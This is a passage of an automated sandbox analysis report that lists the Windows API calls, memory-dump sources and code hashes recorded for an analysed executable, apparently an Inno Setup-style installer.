• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0d6e8dd0d05b5784dbdcfa3146256ffc4dbe9b1a284e4e7eb3306544c838df4f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 52eb814c7c241dc182afdc6c3e242d4e4c9a4e6d94000e289351c80ae23ff87c
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0d6e8dd0d05b5784dbdcfa3146256ffc4dbe9b1a284e4e7eb3306544c838df4f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 53E012B53541483EE780EEAD6C42F9777DC971A714F008037B998D7341D461DD158BA8
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,0045325F,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8F7
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: FormatMessage
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1306739567-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 1d16c149c237ab05d394d1dcd15bc1a2ba242a73302d35381885c392630e106f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 1e04b5e42f682bd3307758a00633d1e15c64123c11c882a5e2d093d9edca25ee
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1d16c149c237ab05d394d1dcd15bc1a2ba242a73302d35381885c392630e106f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E7E0D86178432126F23524166C43B7B110E43C0704FD080267A809F3D6D6EE9949425E
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

APIs
• CreateWindowExA.USER32(00000000,0042368C,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00406329
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
Similarity
• API ID: CreateWindow
• String ID:
• API String ID: 716092398-0
• Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
• Instruction ID: 1d12608fc0467a25e6c73015cc4d191371d7057fe5102c86e19c90aa3d4ae925
• Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
• Instruction Fuzzy Hash: 4CE002B2204309BFDB00DE8ADDC1DABB7ACFB4C654F844105BB1C972428275AD608BB1
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00423608: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 0042361D
• ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
  • Part of subcall function 00423638: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 00423654
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
Similarity
• API ID: InfoParametersSystem$ShowWindow
• String ID:
• API String ID: 3202724764-0
• Opcode ID: 6539159081c566a845655d997cb077fb8df4a929aa301bd67fb88950e555413a
• Instruction ID: 40ba6511a88705317f68f90b714cf273492cbff5df7e869aa0dea3a735aecdb5
• Opcode Fuzzy Hash: 6539159081c566a845655d997cb077fb8df4a929aa301bd67fb88950e555413a
• Instruction Fuzzy Hash: 89D05E123831B03106307BB72805ACB86AC8D966AB389047BB5409B302E91E8A0A61AC
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: TextWindow
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 530164218-0
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(?,0042E41D), ref: 0042E410
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorMode
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDB4,?,0042389F,00423C1C,0041EDB4), ref: 0041F3F2
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetVersion.KERNEL32(?,00419000,00000000,?,?,?,00000001), ref: 0041F136
                                                                                                                                                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F152
                                                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F15E
                                                                                                                                                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F16C
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F19C
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1C5
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1DA
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1EF
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F204
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F219
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F22E
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F243
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F258
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F26D
                                                                                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000001,?,00419000,00000000,?,?,?,00000001), ref: 0041F27F
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
                                                                                                                                                                                                                                                                                                                                                                  • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2323315520-3614243559
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b81bf654ee0ff70beab0d7f19bbe22a8acbbf87b15d66209f82029db40934da3
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d5058fc073e0ad59750b6b6eed82d26134d8568d962b0a84cfd108907e917b52
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b81bf654ee0ff70beab0d7f19bbe22a8acbbf87b15d66209f82029db40934da3
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8D310DB2640700EBEB01EBB9AC86A663294F728724745093FB508DB192D77C5C49CB1C
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 00422A04
                                                                                                                                                                                                                                                                                                                                                                  • ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BCE), ref: 00422A14
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: MessageSendShowWindow
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1631623395-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 2b7e63b6e9aae4c223c42594af27139ce58a511c3b21f904f1463ed4cf30a4d8
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: ac1ceeab966790095f9612ce7a7db5e594191b89627cdcc61fab65d1acc55ab9
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2b7e63b6e9aae4c223c42594af27139ce58a511c3b21f904f1463ed4cf30a4d8
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 79914071B04214BFD711EFA9DA86F9D77F4AB04314F5500BAF504AB3A2CB78AE409B58
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • IsIconic.USER32(?), ref: 004183A3
                                                                                                                                                                                                                                                                                                                                                                  • GetWindowPlacement.USER32(?,0000002C), ref: 004183C0
                                                                                                                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(?), ref: 004183DC
                                                                                                                                                                                                                                                                                                                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 004183EA
                                                                                                                                                                                                                                                                                                                                                                  • GetWindowLongA.USER32(?,000000F8), ref: 004183FF
                                                                                                                                                                                                                                                                                                                                                                  • ScreenToClient.USER32(00000000), ref: 00418408
                                                                                                                                                                                                                                                                                                                                                                  • ScreenToClient.USER32(00000000,?), ref: 00418413
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                                                                                                                                                                                                                                                                                                                  • String ID: ,
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2266315723-3772416878
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 6217f91ca86bc21168c1a31dc77beadf87db026dacfe8a4e2043101b83599555
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: f1655e9c1aaa1f9d3e17845697c0dfec8ab0781743990dff6cd0a114faef5a7c
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6217f91ca86bc21168c1a31dc77beadf87db026dacfe8a4e2043101b83599555
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D6112B71505201AFDB00EF69C885F9B77E8AF49314F18067EBD58DB286D738D900CBA9
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000028), ref: 004555DF
                                                                                                                                                                                                                                                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004555E5
                                                                                                                                                                                                                                                                                                                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 004555FE
                                                                                                                                                                                                                                                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00455625
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0045562A
                                                                                                                                                                                                                                                                                                                                                                  • ExitWindowsEx.USER32(00000002,00000000), ref: 0045563B
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                                                                                                                                                                                                                                                                  • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 107509674-3733053543
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,00497BB2,?,?,00000000,0049B628,?,00497D3C,00000000,00497D90,?,?,00000000,0049B628), ref: 00497ACB
                                                                                                                                                                                                                                                                                                                                                                  • SetFileAttributesA.KERNEL32(00000000,00000010), ref: 00497B4E
                                                                                                                                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(000000FF,?,00000000,00497B8A,?,00000000,?,00000000,00497BB2,?,?,00000000,0049B628,?,00497D3C,00000000), ref: 00497B66
                                                                                                                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(000000FF,00497B91,00497B8A,?,00000000,?,00000000,00497BB2,?,?,00000000,0049B628,?,00497D3C,00000000,00497D90), ref: 00497B84
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: FileFind$AttributesCloseFirstNext
                                                                                                                                                                                                                                                                                                                                                                  • String ID: isRS-$isRS-???.tmp
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 134685335-3422211394
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457449
                                                                                                                                                                                                                                                                                                                                                                  • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457470
                                                                                                                                                                                                                                                                                                                                                                  • SetForegroundWindow.USER32(?), ref: 00457481
                                                                                                                                                                                                                                                                                                                                                                  • NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,0045775B,?,00000000,00457797), ref: 00457746
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • Cannot evaluate variable because [Code] isn't running yet, xrefs: 004575C6
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: MessagePostWindow$ForegroundNtdllProc_
                                                                                                                                                                                                                                                                                                                                                                  • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2236967946-3182603685
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455F37), ref: 00455E28
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00455E2E
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Similarity
